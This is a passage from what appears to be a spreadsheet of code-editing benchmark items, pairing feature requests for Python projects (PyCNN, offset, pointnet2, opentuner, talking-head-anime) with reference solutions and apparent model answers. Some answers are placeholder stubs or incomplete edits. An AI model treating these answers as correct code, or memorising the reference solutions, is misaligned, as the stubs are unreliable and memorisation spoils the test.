\'images/lenna_diagonal.png\')\n#New\ncnn.horizontalLineDetection(\'images/lenna.gif\', \'images/lenna_horizontal.png\')'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify: Add a new method to detect horizontal lines\nclass PyCNN:\n    def horizontalLineDetection(self, input_image, output_image):\n        # New: Apply convolution kernel for horizontal line detection\n        # (Assuming implementation details are provided here)\n        pass\n\n    def edgeDetection(self, input_image, output_image):\n        # Existing method\n        pass\n\n    def diagonalLineDetection(self, input_image, output_image):\n        # Existing method\n        pass', '#file 2': "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pycnn import PyCNN\n\n# Initialize object\ncnn = PyCNN()\n\n# Perform respective image processing techniques on the given image\n\n#Modify: Invoke the new method for horizontal line detection\ncnn.horizontalLineDetection('images/lenna.gif', 'images/lenna_horizontal.png')\n\ncnn.edgeDetection('images/lenna.gif', 'images/lenna_edge.png')\ncnn.diagonalLineDetection('images/lenna.gif', 'images/lenna_diagonal.png')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def current():\n    try:\n        return _tls.current_proc\n    except AttributeError:\n        _create_main_proc()\n        return _tls.current_proc', 'invoking_code_segment': '@maintask\ndef main():\n    print(current)\n    c = makechan(1)\n    signal.notify(c, os.SIGINT, os.SIGTERM, os.SIGQUIT)\n    s = c.recv()\n    print("got signal: %s" % s)\n    print(kernel.runq)', 'feature_description': "Add a feature to log the current proc's state before handling signals. This includes retrieving the current proc and logging its state information (fiber status, waiting/sleeping flags) before signal notification.", 'modified_complete_code': '# offset/offset/core/proc.py\n# -*- coding: utf-8 -*-\n#\n# This file is part of offset. See the NOTICE for more information.\n\nimport threading\nimport time\nimport logging\n\ntry:\n    import fibers\nexcept ImportError:\n    raise RuntimeError("Platform not supported")\n\n_tls = threading.local()\n#New\nlogger = logging.getLogger(__name__)\n\nclass ProcExit(Exception):\n    """ exception raised when the proc is asked to exit """\n\n#Modify\ndef current():\n    try:\n        return _tls.current_proc\n    except AttributeError:\n        _create_main_proc()\n        return _tls.current_proc\n\n#New\ndef log_proc_state():\n    """Log the current proc\'s state information"""\n    try:\n        proc = _tls.current_proc\n        state_info = {\n            \'fiber_alive\': proc.fiber.is_alive(),\n            \'waiting\': proc.waiting,\n            \'sleeping\': proc.sleeping,\n            \'is_started\': proc._is_started\n        }\n        logger.info(f"Current proc state: {state_info}")\n        return state_info\n    except AttributeError:\n        logger.warning("No current proc available")\n        return None\n\nclass Proc(object):\n\n    def __init__(self, m, func, args, kwargs):\n\n        def _run():\n            _tls.current_proc = self\n            self._is_started = 1\n            try:\n                return func(*args, **kwargs)\n            except ProcExit:\n                pass\n            finally:\n                m.removeg()\n\n        self.m = m\n        self.fiber = fibers.Fiber(_run)\n        self.waiting = False\n        self.sleeping = False\n        self.param = None\n        self._is_started = 0\n\n    def switch(self):\n        curr = current()\n        try:\n            self.fiber.switch()\n        finally:\n            _tls.current_proc = curr\n\n    def throw(self, *args):\n        curr = current()\n        try:\n            self.fiber.throw(*args)\n        finally:\n            _tls.current_proc = curr\n\n    def park(self):\n        self.m.park(self)\n\n    def ready(self):\n        self.m.ready(self)\n\n    def is_alive(self):\n        return self._is_started &lt; 0 or self.fiber.is_alive()\n\n    def terminate(self):\n        self.throw(ProcExit, ProcExit("exit"))\n        time.sleep(0.1)\n\n    def __eq__(self, other):\n        return self.fiber == other.fiber\n\n\ndef _create_main_proc():\n    main_proc = Proc.__new__(Proc)\n    main_proc.fiber = fibers.current()\n    main_proc._is_started = True\n    main_proc.sleeping = True\n\n    _tls.main_proc = main_proc\n    _tls.current_proc = main_proc\n\n---\n\n# offset/examples/demo_signal.py\n# -*- coding: utf-8 -*-\n#\n# This file is part of offset. See the NOTICE for more information.\n\nfrom offset import makechan, run, maintask\nfrom offset import os\nfrom offset.os import signal\nimport sys\nimport logging\n\nfrom offset.core.proc import current, log_proc_state\nfrom offset.core.kernel import kernel\n\n#New\nlogging.basicConfig(level=logging.INFO, format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\')\n\n@maintask\ndef main():\n    #New\n    log_proc_state()\n    print(current)\n    c = makechan(1)\n    #New\n    logger = logging.getLogger(__name__)\n    logger.info("Setting up signal handlers")\n    signal.notify(c, os.SIGINT, os.SIGTERM, os.SIGQUIT)\n    #New\n    log_proc_state()\n    s = c.recv()\n    print("got signal: %s" % s)\n    print(kernel.runq)\n\nrun()\nprint("after run")\nprint(kernel.running)'}</t>
  </si>
  <si>
    <t>{'#file 1': '# -*- coding: utf-8 -\n# This file is part of offset. See the NOTICE for more information.\n\nimport threading\nimport time\nimport logging\n\ntry:\n    import fibers\nexcept ImportError:\n    raise RuntimeError("Platform not supported")\n\n_tls = threading.local()\n\n# Modify\ndef current():\n    try:\n        logging.info(f"Current proc state: {_tls.current_proc}")\n        return _tls.current_proc\n    except AttributeError:\n        _create_main_proc()\n        return _tls.current_proc\n\nclass Proc(object):\n\n    def __init__(self, m, func, args, kwargs):\n\n        def _run():\n            _tls.current_proc = self\n            self._is_started = 1\n            try:\n                return func(*args, **kwargs)\n            except ProcExit:\n                pass\n            finally:\n                m.removeg()\n\n        self.m = m\n        self.fiber = fibers.Fiber(_run)\n        self.waiting = False\n        self.sleeping = False\n        self.param = None\n        self._is_started = 0\n\n    def switch(self):\n        curr = current()\n        try:\n            self.fiber.switch()\n        finally:\n            _tls.current_proc = curr\n\n    def throw(self, *args):\n        curr = current()\n        try:\n            self.fiber.throw(*args)\n        finally:\n            _tls.current_proc = curr\n\n    def park(self):\n        self.m.park(self)\n\n    def ready(self):\n        self.m.ready(self)\n\n    def is_alive(self):\n        return self._is_started &lt; 0 or self.fiber.is_alive()\n\n    def terminate(self):\n        self.throw(ProcExit, ProcExit("exit"))\n        time.sleep(0.1)\n\n    def __eq__(self, other):\n        return self.fiber == other.fiber\n\n\ndef _create_main_proc():\n    main_proc = Proc.__new__(Proc)\n    main_proc.fiber = fibers.current()\n    main_proc._is_started = True\n    main_proc.sleeping = True\n\n    _tls.main_proc = main_proc\n    _tls.current_proc = main_proc', '#file 2': '# -*- coding: utf-8 -\n# This file is part of offset. See the NOTICE for more information.\n\nfrom offset import makechan, run, maintask\nfrom offset import os\nfrom offset.os import signal\nimport sys\nimport logging\n\nfrom offset.core.proc import current\nfrom offset.core.kernel import kernel\n\n# New\nlogging.basicConfig(level=logging.INFO)\n\n@maintask\ndef main():\n    print(current)\n    c = makechan(1)\n    signal.notify(c, os.SIGINT, os.SIGTERM, os.SIGQUIT)\n    s = c.recv()\n    print("got signal: %s" % s)\n    print(kernel.runq)\n\nrun()\nprint("after run")\nprint(kernel.running)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'furthest_point_sample = FurthestPointSampling.apply', 'invoking_code_segment': 'import pointnet2_ops.pointnet2_utils', 'feature_description': 'Add a feature to allow users to specify a custom sampling method instead of using the default furthest point sampling. This enables flexibility in point cloud sampling strategies by supporting user-defined sampling functions while maintaining backward compatibility with the default FPS method.', 'modified_complete_code': '# File 1: pointnet2_utils.py\n\nimport torch\nimport torch.nn as nn\nimport warnings\nfrom torch.autograd import Function\nfrom typing import *\n\ntry:\n    import pointnet2_ops._ext as _ext\nexcept ImportError:\n    from torch.utils.cpp_extension import load\n    import glob\n    import os.path as osp\n    import os\n\n    warnings.warn("Unable to load pointnet2_ops cpp extension. JIT Compiling.")\n\n    _ext_src_root = osp.join(osp.dirname(__file__), "_ext-src")\n    _ext_sources = glob.glob(osp.join(_ext_src_root, "src", "*.cpp")) + glob.glob(\n        osp.join(_ext_src_root, "src", "*.cu")\n    )\n    _ext_headers = glob.glob(osp.join(_ext_src_root, "include", "*"))\n\n    os.environ["TORCH_CUDA_ARCH_LIST"] = "3.7+PTX;5.0;6.0;6.1;6.2;7.0;7.5"\n    _ext = load(\n        "_ext",\n        sources=_ext_sources,\n        extra_include_paths=[osp.join(_ext_src_root, "include")],\n        extra_cflags=["-O3"],\n        extra_cuda_cflags=["-O3", "-Xfatbin", "-compress-all"],\n        with_cuda=True,\n    )\n\n# New: Global registry for custom sampling methods\n_custom_sampling_methods = {}\n\n# New: Function to register custom sampling methods\ndef register_sampling_method(name, sampling_func):\n    """Register a custom sampling method.\n    \n    Parameters\n    ----------\n    name : str\n        Name of the sampling method\n    sampling_func : callable\n        Function that takes (xyz, npoint) and returns sampled indices (B, npoint)\n    """\n    _custom_sampling_methods[name] = sampling_func\n\n# New: Function to get registered sampling method\ndef get_sampling_method(name):\n    """Get a registered sampling method by name.\n    \n    Parameters\n    ----------\n    name : str\n        Name of the sampling method\n        \n    Returns\n    -------\n    callable or None\n        The sampling function if registered, None otherwise\n    """\n    return _custom_sampling_methods.get(name, None)\n\nclass FurthestPointSampling(Function):\n    @staticmethod\n    def forward(ctx, xyz, npoint):\n        # type: (Any, torch.Tensor, int) -&gt; torch.Tensor\n        r"""\n        Uses iterative furthest point sampling to select a set of npoint features that have the largest\n        minimum distance\n\n        Parameters\n        ----------\n        xyz : torch.Tensor\n            (B, N, 3) tensor where N &gt; npoint\n        npoint : int32\n            number of features in the sampled set\n\n        Returns\n        -------\n        torch.Tensor\n            (B, npoint) tensor containing the set\n        """\n        out = _ext.furthest_point_sampling(xyz, npoint)\n\n        ctx.mark_non_differentiable(out)\n\n        return out\n\n    @staticmethod\n    def backward(ctx, grad_out):\n        return ()\n\n\nfurthest_point_sample = FurthestPointSampling.apply\n\n# Modify: Enhanced sampling function with custom method support\ndef furthest_point_sample_with_custom(xyz, npoint, custom_method=None):\n    """Sample points using furthest point sampling or a custom method.\n    \n    Parameters\n    ----------\n    xyz : torch.Tensor\n        (B, N, 3) tensor where N &gt; npoint\n    npoint : int32\n        number of features in the sampled set\n    custom_method : str or callable, optional\n        Name of registered custom sampling method or a callable function.\n        If None, uses default furthest point sampling.\n        If callable, should take (xyz, npoint) and return (B, npoint) indices.\n        \n    Returns\n    -------\n    torch.Tensor\n        (B, npoint) tensor containing the sampled indices\n    """\n    if custom_method is None:\n        # Use default furthest point sampling\n        return furthest_point_sample(xyz, npoint)\n    elif isinstance(custom_method, str):\n        # Look up registered custom method\n        sampling_func = get_sampling_method(custom_method)\n        if sampling_func is None:\n            raise ValueError(f"Sampling method \'{custom_method}\' not registered. Available methods: {list(_custom_sampling_methods.keys())}")\n        return sampling_func(xyz, npoint)\n    elif callable(custom_method):\n        # Use provided callable directly\n        return custom_method(xyz, npoint)\n    else:\n        raise TypeError(f"custom_method must be None, str, or callable, got {type(custom_method)}")\n\nclass GatherOperation(Function):\n    @staticmethod\n    def forward(ctx, features, idx):\n        # type: (Any, torch.Tensor, torch.Tensor) -&gt; torch.Tensor\n        r"""\n\n        Parameters\n        ----------\n        features : torch.Tensor\n            (B, C, N) tensor\n\n        idx : torch.Tensor\n            (B, npoint) tensor of the features to gather\n\n        Returns\n        -------\n        torch.Tensor\n            (B, C, npoint) tensor\n        """\n\n        ctx.save_for_backward(idx, features)\n\n        return _ext.gather_points(features, idx)\n\n    @staticmethod\n    def backward(ctx, grad_out):\n        idx, features = ctx.saved_tensors\n        N = features.size(2)\n\n        grad_features = _ext.gather_points_grad(grad_out.contiguous(), idx, N)\n        return grad_features, None\n\n\ngather_operation = GatherOperation.apply\n\n\nclass ThreeNN(Function):\n    @staticmethod\n    def forward(ctx, unknown, known):\n        # type: (Any, torch.Tensor, torch.Tensor) -&gt; Tuple[torch.Tensor, torch.Tensor]\n        r"""\n            Find the three nearest neighbors of unknown in known\n        Parameters\n        ----------\n        unknown : torch.Tensor\n            (B, n, 3) tensor of known features\n        known : torch.Tensor\n            (B, m, 3) tensor of unknown features\n\n        Returns\n        -------\n        dist : torch.Tensor\n            (B, n, 3) l2 distance to the three nearest neighbors\n        idx : torch.Tensor\n            (B, n, 3) index of 3 nearest neighbors\n        """\n        dist2, idx = _ext.three_nn(unknown, known)\n        dist = torch.sqrt(dist2)\n\n        ctx.mark_non_differentiable(dist, idx)\n\n        return dist, idx\n\n    @staticmethod\n    def backward(ctx, grad_dist, grad_idx):\n        return ()\n\n\nthree_nn = ThreeNN.apply\n\n\nclass ThreeInterpolate(Function):\n    @staticmethod\n    def forward(ctx, features, idx, weight):\n        # type(Any, torch.Tensor, torch.Tensor, torch.Tensor) -&gt; Torch.Tensor\n        r"""\n            Performs weight linear interpolation on 3 features\n        Parameters\n        ----------\n        features : torch.Tensor\n            (B, c, m) Features descriptors to be interpolated from\n        idx : torch.Tensor\n            (B, n, 3) three nearest neighbors of the target features in features\n        weight : torch.Tensor\n            (B, n, 3) weights\n\n        Returns\n        -------\n        torch.Tensor\n            (B, c, n) tensor of the interpolated features\n        """\n        ctx.save_for_backward(idx, weight, features)\n\n        return _ext.three_interpolate(features, idx, weight)\n\n    @staticmethod\n    def backward(ctx, grad_out):\n        # type: (Any, torch.Tensor) -&gt; Tuple[torch.Tensor, torch.Tensor, torch.Tensor]\n        r"""\n        Parameters\n        ----------\n        grad_out : torch.Tensor\n            (B, c, n) tensor with gradients of ouputs\n\n        Returns\n        -------\n        grad_features : torch.Tensor\n            (B, c, m) tensor with gradients of features\n\n        None\n\n        None\n        """\n        idx, weight, features = ctx.saved_tensors\n        m = features.size(2)\n\n        grad_features = _ext.three_interpolate_grad(\n            grad_out.contiguous(), idx, weight, m\n        )\n\n        return grad_features, torch.zeros_like(idx), torch.zeros_like(weight)\n\n\nthree_interpolate = ThreeInterpolate.apply\n\n\nclass GroupingOperation(Function):\n    @staticmethod\n    def forward(ctx, features, idx):\n        # type: (Any, torch.Tensor, torch.Tensor) -&gt; torch.Tensor\n        r"""\n\n        Parameters\n        ----------\n        features : torch.Tensor\n            (B, C, N) tensor of features to group\n        idx : torch.Tensor\n            (B, npoint, nsample) tensor containing the indicies of features to group with\n\n        Returns\n        -------\n        torch.Tensor\n            (B, C, npoint, nsample) tensor\n        """\n        ctx.save_for_backward(idx, features)\n\n        return _ext.group_points(features, idx)\n\n    @staticmethod\n    def backward(ctx, grad_out):\n        # type: (Any, torch.tensor) -&gt; Tuple[torch.Tensor, torch.Tensor]\n        r"""\n\n        Parameters\n        ----------\n        grad_out : torch.Tensor\n            (B, C, npoint, nsample) tensor of the gradients of the output from forward\n\n        Returns\n        -------\n        torch.Tensor\n            (B, C, N) gradient of the features\n        None\n        """\n        idx, features = ctx.saved_tensors\n        N = features.size(2)\n\n        grad_features = _ext.group_points_grad(grad_out.contiguous(), idx, N)\n\n        return grad_features, torch.zeros_like(idx)\n\n\ngrouping_operation = GroupingOperation.apply\n\n\nclass BallQuery(Function):\n    @staticmethod\n    def forward(ctx, radius, nsample, xyz, new_xyz):\n        # type: (Any, float, int, torch.Tensor, torch.Tensor) -&gt; torch.Tensor\n        r"""\n\n        Parameters\n        ----------\n        radius : float\n            radius of the balls\n        nsample : int\n            maximum number of features in the balls\n        xyz : torch.Tensor\n            (B, N, 3) xyz coordinates of the features\n        new_xyz : torch.Tensor\n            (B, npoint, 3) centers of the ball query\n\n        Returns\n        -------\n        torch.Tensor\n            (B, npoint, nsample) tensor with the indicies of the features that form the query balls\n        """\n        output = _ext.ball_query(new_xyz, xyz, radius, nsample)\n\n        ctx.mark_non_differentiable(output)\n\n        return output\n\n    @staticmethod\n    def backward(ctx, grad_out):\n        return ()\n\n\nball_query = BallQuery.apply\n\n\nclass QueryAndGroup(nn.Module):\n    r"""\n    Groups with a ball query of radius\n\n    Parameters\n    ---------\n    radius : float32\n        Radius of ball\n    nsample : int32\n        Maximum number of features to gather in the ball\n    """\n\n    def __init__(self, radius, nsample, use_xyz=True):\n        # type: (QueryAndGroup, float, int, bool) -&gt; None\n        super(QueryAndGroup, self).__init__()\n        self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz\n\n    def forward(self, xyz, new_xyz, features=None):\n        # type: (QueryAndGroup, torch.Tensor. torch.Tensor, torch.Tensor) -&gt; Tuple[Torch.Tensor]\n        r"""\n        Parameters\n        ----------\n        xyz : torch.Tensor\n            xyz coordinates of the features (B, N, 3)\n        new_xyz : torch.Tensor\n            centriods (B, npoint, 3)\n        features : torch.Tensor\n            Descriptors of the features (B, C, N)\n\n        Returns\n        -------\n        new_features : torch.Tensor\n            (B, 3 + C, npoint, nsample) tensor\n        """\n\n        idx = ball_query(self.radius, self.nsample, xyz, new_xyz)\n        xyz_trans = xyz.transpose(1, 2).contiguous()\n        grouped_xyz = grouping_operation(xyz_trans, idx)  # (B, 3, npoint, nsample)\n        grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)\n\n        if features is not None:\n            grouped_features = grouping_operation(features, idx)\n            if self.use_xyz:\n                new_features = torch.cat(\n                    [grouped_xyz, grouped_features], dim=1\n                )  # (B, C + 3, npoint, nsample)\n            else:\n                new_features = grouped_features\n        else:\n            assert (\n                self.use_xyz\n            ), "Cannot have not features and not use xyz as a feature!"\n            new_features = grouped_xyz\n\n        return new_features\n\n\nclass GroupAll(nn.Module):\n    r"""\n    Groups all features\n\n    Parameters\n    ---------\n    """\n\n    def __init__(self, use_xyz=True):\n        # type: (GroupAll, bool) -&gt; None\n        super(GroupAll, self).__init__()\n        self.use_xyz = use_xyz\n\n    def forward(self, xyz, new_xyz, features=None):\n        # type: (GroupAll, torch.Tensor, torch.Tensor, torch.Tensor) -&gt; Tuple[torch.Tensor]\n        r"""\n        Parameters\n        ----------\n        xyz : torch.Tensor\n            xyz coordinates of the features (B, N, 3)\n        new_xyz : torch.Tensor\n            Ignored\n        features : torch.Tensor\n            Descriptors of the features (B, C, N)\n\n        Returns\n        -------\n        new_features : torch.Tensor\n            (B, C + 3, 1, N) tensor\n        """\n\n        grouped_xyz = xyz.transpose(1, 2).unsqueeze(2)\n        if features is not None:\n            grouped_features = features.unsqueeze(2)\n            if self.use_xyz:\n                new_features = torch.cat(\n                    [grouped_xyz, grouped_features], dim=1\n                )  # (B, 3 + C, 1, N)\n            else:\n                new_features = grouped_features\n        else:\n            new_features = grouped_xyz\n\n        return new_features\n\n# File 2: __init__.py\n# Modify: Updated imports to include new sampling functions\nimport pointnet2_ops.pointnet2_modules\nimport pointnet2_ops.pointnet2_utils\nfrom pointnet2_ops._version import __version__\n# New: Export custom sampling registration functions\nfrom pointnet2_ops.pointnet2_utils import (\n    register_sampling_method,\n    get_sampling_method,\n    furthest_point_sample_with_custom\n)\n\n__all__ = [\n    \'pointnet2_modules\',\n    \'pointnet2_utils\',\n    \'__version__\',\n    \'register_sampling_method\',\n    \'get_sampling_method\',\n    \'furthest_point_sample_with_custom\'\n]'}</t>
  </si>
  <si>
    <t xml:space="preserve">### File 1: pointnet2_ops/pointnet2_utils.py
class FurthestPointSampling(Function):
    @staticmethod
    def forward(ctx, xyz, npoint):
        # type: (Any, torch.Tensor, int) -&gt; torch.Tensor
        r"""
        Uses iterative furthest point sampling to select a set of npoint features that have the largest
        minimum distance
        Parameters
        ----------
        xyz : torch.Tensor
            (B, N, 3) tensor where N &gt; npoint
        npoint : int32
            number of features in the sampled set
        Returns
        -------
        torch.Tensor
            (B, npoint) tensor containing the set
        """
        out = _ext.furthest_point_sampling(xyz, npoint)
        ctx.mark_non_differentiable(out)
        return out
    @staticmethod
    def backward(ctx, grad_out):
        return ()
furthest_point_sample = FurthestPointSampling.apply
#Modify: Add a new parameter to allow custom sampling function
def custom_sampling(xyz, npoint):
    # Example custom sampling function
    return torch.randint(0, xyz.shape[1], (xyz.shape[0], npoint), device=xyz.device)
#New: Add a function to handle custom sampling
def sample_points(xyz, npoint, custom_sample_fn=None):
    if custom_sample_fn:
        return custom_sample_fn(xyz, npoint)
    else:
        return furthest_point_sample(xyz, npoint)
### File 2: pointnet2_ops/pointnet2_modules.py
class PointnetSAModuleMSG(_PointnetSAModuleBase):
    r"""Pointnet set abstraction layer with multiscale grouping."""
    def __init__(self, *, npoint: int, radii: List[float], nsamples: List[int], mlps: List[List[int]], bn: bool = True, use_xyz: bool = True, pool_method='max_pool', custom_sample_fn=None):
        """
        :param npoint: int
        :param radii: list of float, list of radii to group with
        :param nsamples: list of int, number of samples in each ball query
        :param mlps: list of list of int, spec of the pointnet before the global pooling for each scale
        :param bn: whether to use batchnorm
        :param use_xyz: 
        :param pool_method: max_pool / avg_pool
        :param custom_sample_fn: Custom sampling function
        """
        super().__init__()
        assert len(radii) == len(nsamples) == len(mlps)
        self.npoint = npoint
        self.groupers = nn.ModuleList()
        self.mlps = nn.ModuleList()
        self.custom_sample_fn = custom_sample_fn
        for i in range(len(radii)):
            radius = radii[i]
            nsample = nsamples[i]
            self.groupers.append(QueryAndGroup(radius, nsample, use_xyz))
            mlp_spec = mlps[i]
            if use_xyz:
                mlp_spec[0] += 3
            self.mlps.append(pt_utils.SharedMLP(mlp_spec, bn=bn, activation_fn=nn.ReLU()))
        self.pool_method = pool_method
    def forward(self, xyz: torch.Tensor, features: torch.Tensor = None) -&gt; (torch.Tensor, torch.Tensor):
        """
        :param xyz: (B, N, 3) tensor of the xyz coordinates of the features
        :param features: (B, C, N) tensor of the descriptors of the features
        :return: 
            new_xyz: (B, npoint, 3) tensor of the new features' xyz
            new_features: (B, \sum_k(mlps[k][-1]), npoint) tensor of the new_features descriptors
        """
        #Modify: Use custom sampling function if provided
        new_xyz = gather_operation(xyz.transpose(1, 2).contiguous(), sample_points(xyz, self.npoint, self.custom_sample_fn)).transpose(1, 2).contiguous()  # (B, npoint, 3)
        new_features_list = []
        for i in range(len(self.groupers)):
            new_features = self.groupers[i](xyz, new_xyz, features)
            new_features = self.mlps[i](new_features)
            if self.pool_method == 'max_pool':
                new_features = F.max_pool2d(new_features, kernel_size=[1, new_features.size(3)])
            elif self.pool_method == 'avg_pool':
                new_features = F.avg_pool2d(new_features, kernel_size=[1, new_features.size(3)])
            else:
                raise NotImplementedError
            new_features_list.append(new_features)
        return new_xyz, torch.cat(new_features_list, dim=1)
</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Configuration(Base):\n    program_id = Column(ForeignKey(Program.id))\n    program = relationship(Program)\n    hash = Column(String(64))\n    data = Column(PickleType(pickler=CompressedPickler))\n\n    @classmethod\n    def get(cls, session, program, hashv, datav):\n        try:\n            session.flush()\n            return (session.query(Configuration)\n                    .filter_by(program=program, hash=hashv).one())\n        except sqlalchemy.orm.exc.NoResultFound:\n            t = Configuration(program=program, hash=hashv, data=datav)\n            session.add(t)\n            return t', 'invoking_code_segment': 'def main(args):\n    if \'://\' not in args.database:\n        args.database = "sqlite:///" + args.database\n    engine, Session = opentuner.resultsdb.connect(args.database)\n    session = Session()\n\n    config_count = session.query(Configuration).count()\n    # result_count = session.query(Result).count()\n    # desired_result_count = session.query(DesiredResult).count()\n\n    if args.level &gt;= 1:\n        q = (session.query(Configuration)\n             .filter(~Configuration.id.in_(session.query(Result.configuration_id)\n                                           .filter_by(was_new_best=True)\n                                           .subquery()))\n             .filter(Configuration.data != None))\n\n        log.info("%s: compacted %d of %d Configurations",\n                 args.database,\n                 q.update({\'data\': None}, False),\n                 config_count)\n        session.commit()', 'feature_description': 'Add a feature to track the number of times a configuration is used by adding a usage_count column to the Configuration model and incrementing it whenever a configuration is referenced in a Result.', 'modified_complete_code': '#file 1: opentuner/opentuner/resultsdb/models.py\n\nclass Configuration(Base):\n    program_id = Column(ForeignKey(Program.id))\n    program = relationship(Program)\n    hash = Column(String(64))\n    data = Column(PickleType(pickler=CompressedPickler))\n    #New\n    usage_count = Column(Integer, default=0)  # Track number of times configuration is used\n\n    @classmethod\n    def get(cls, session, program, hashv, datav):\n        try:\n            session.flush()\n            return (session.query(Configuration)\n                    .filter_by(program=program, hash=hashv).one())\n        except sqlalchemy.orm.exc.NoResultFound:\n            t = Configuration(program=program, hash=hashv, data=datav, usage_count=0)\n            session.add(t)\n            return t\n    \n    #New\n    @classmethod\n    def increment_usage(cls, session, config_id):\n        """Increment the usage count for a configuration"""\n        config = session.query(Configuration).filter_by(id=config_id).one()\n        config.usage_count += 1\n        session.add(config)\n        return config\n\n\n#file 2: opentuner/opentuner/utils/compactdb.py\n\ndef main(args):\n    if \'://\' not in args.database:\n        args.database = "sqlite:///" + args.database\n    engine, Session = opentuner.resultsdb.connect(args.database)\n    session = Session()\n\n    config_count = session.query(Configuration).count()\n    # result_count = session.query(Result).count()\n    # desired_result_count = session.query(DesiredResult).count()\n\n    if args.level &gt;= 1:\n        q = (session.query(Configuration)\n             .filter(~Configuration.id.in_(session.query(Result.configuration_id)\n                                           .filter_by(was_new_best=True)\n                                           .subquery()))\n             .filter(Configuration.data != None))\n\n        log.info("%s: compacted %d of %d Configurations",\n                 args.database,\n                 q.update({\'data\': None}, False),\n                 config_count)\n        session.commit()\n    \n    #New\n    if args.level &gt;= 1:\n        # Update usage counts based on Result references\n        results = session.query(Result).all()\n        usage_stats = {}\n        for result in results:\n            if result.configuration_id:\n                usage_stats[result.configuration_id] = usage_stats.get(result.configuration_id, 0) + 1\n        \n        for config_id, count in usage_stats.items():\n            config = session.query(Configuration).filter_by(id=config_id).one()\n            config.usage_count = count\n            session.add(config)\n        \n        session.commit()\n        log.info("%s: updated usage counts for configurations", args.database)\n\n    if args.level &gt;= 2:\n        session.execute(\'VACUUM;\')\n        session.commit()\n\n    log.info(\'done\')'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class Configuration(Base):\n    program_id = Column(ForeignKey(Program.id))\n    program = relationship(Program)\n    hash = Column(String(64))\n    data = Column(PickleType(pickler=CompressedPickler))\n    usage_count = Column(Integer, default=0)  #Modify\n\n    @classmethod\n    def get(cls, session, program, hashv, datav):\n        try:\n            session.flush()\n            config = (session.query(Configuration)\n                    .filter_by(program=program, hash=hashv).one())\n            config.usage_count += 1  #Modify\n            session.commit()  #Modify\n            return config\n        except sqlalchemy.orm.exc.NoResultFound:\n            t = Configuration(program=program, hash=hashv, data=datav)\n            session.add(t)\n            return t', '#file 2': 'from opentuner.resultsdb.models import Configuration\n\n# ... other code ...\n\nconfig = Configuration.get(session, program, hashv, datav)\n\n# ... other code ...'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class GridChangeApplier:\n    def __init__(self):\n        self.last_n = None\n        self.last_device = None\n        self.last_identity = None\n    def apply(self, grid_change: Tensor, image: Tensor, align_corners: bool = False) -&gt; Tensor:\n        n, c, h, w = image.shape\n        device = grid_change.device\n        grid_change = torch.transpose(grid_change.view(n, 2, h * w), 1, 2).view(n, h, w, 2)\n        if n == self.last_n and device == self.last_device:\n            identity = self.last_identity\n        else:\n            identity = torch.tensor(\n                [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],\n                dtype=grid_change.dtype,\n                device=device,\n                requires_grad=False) \\\n                .unsqueeze(0).repeat(n, 1, 1)\n            self.last_identity = identity\n            self.last_n = n\n            self.last_device = device\n        base_grid = affine_grid(identity, [n, c, h, w], align_corners=align_corners)\n        grid = base_grid + grid_change\n        resampled_image = grid_sample(image, grid, mode='bilinear', padding_mode='border', align_corners=align_corners)\n        return resampled_image", 'invoking_code_segment': 'self.grid_change_applier = GridChangeApplier()\n...\niris_mouth_image_0 = self.grid_change_applier.apply(iris_mouth_grid_change, image)', 'feature_description': "Add support for a new interpolation mode parameter in the grid change application to allow flexible selection between 'bilinear', 'nearest', and 'bicubic' interpolation modes when resampling images during grid transformations.", 'modified_complete_code': '# File 1: talking-head-anime-3-demo/tha3/nn/image_processing_util.py\nimport torch\nfrom torch import Tensor\nfrom torch.nn.functional import affine_grid, grid_sample\n\ndef apply_rgb_change(alpha: Tensor, color_change: Tensor, image: Tensor):\n    image_rgb = image[:, 0:3, :, :]\n    color_change_rgb = color_change[:, 0:3, :, :]\n    output_rgb = color_change_rgb * alpha + image_rgb * (1 - alpha)\n    return torch.cat([output_rgb, image[:, 3:4, :, :]], dim=1)\n\ndef apply_grid_change(grid_change, image: Tensor) -&gt; Tensor:\n    n, c, h, w = image.shape\n    device = grid_change.device\n    grid_change = torch.transpose(grid_change.view(n, 2, h * w), 1, 2).view(n, h, w, 2)\n    identity = torch.tensor(\n        [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],\n        dtype=grid_change.dtype,\n        device=device).unsqueeze(0).repeat(n, 1, 1)\n    base_grid = affine_grid(identity, [n, c, h, w], align_corners=False)\n    grid = base_grid + grid_change\n    resampled_image = grid_sample(image, grid, mode=\'bilinear\', padding_mode=\'border\', align_corners=False)\n    return resampled_image\n\nclass GridChangeApplier:\n    def __init__(self):\n        self.last_n = None\n        self.last_device = None\n        self.last_identity = None\n        # #New: Add interpolation mode support\n        self.interpolation_mode = \'bilinear\'\n\n    def apply(self, grid_change: Tensor, image: Tensor, align_corners: bool = False, interpolation_mode: str = \'bilinear\') -&gt; Tensor:\n        # #Modify: Add interpolation_mode parameter\n        n, c, h, w = image.shape\n        device = grid_change.device\n        grid_change = torch.transpose(grid_change.view(n, 2, h * w), 1, 2).view(n, h, w, 2)\n        if n == self.last_n and device == self.last_device:\n            identity = self.last_identity\n        else:\n            identity = torch.tensor(\n                [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],\n                dtype=grid_change.dtype,\n                device=device,\n                requires_grad=False) \\\n                .unsqueeze(0).repeat(n, 1, 1)\n            self.last_identity = identity\n            self.last_n = n\n            self.last_device = device\n        base_grid = affine_grid(identity, [n, c, h, w], align_corners=align_corners)\n        grid = base_grid + grid_change\n        # #Modify: Use interpolation_mode parameter instead of hardcoded \'bilinear\'\n        resampled_image = grid_sample(image, grid, mode=interpolation_mode, padding_mode=\'border\', align_corners=align_corners)\n        return resampled_image\n    \n    # #New: Method to set default interpolation mode\n    def set_interpolation_mode(self, mode: str):\n        if mode not in [\'nearest\', \'bilinear\', \'bicubic\']:\n            raise ValueError(f"Unsupported interpolation mode: {mode}. Supported modes: \'nearest\', \'bilinear\', \'bicubic\'")\n        self.interpolation_mode = mode\n\ndef 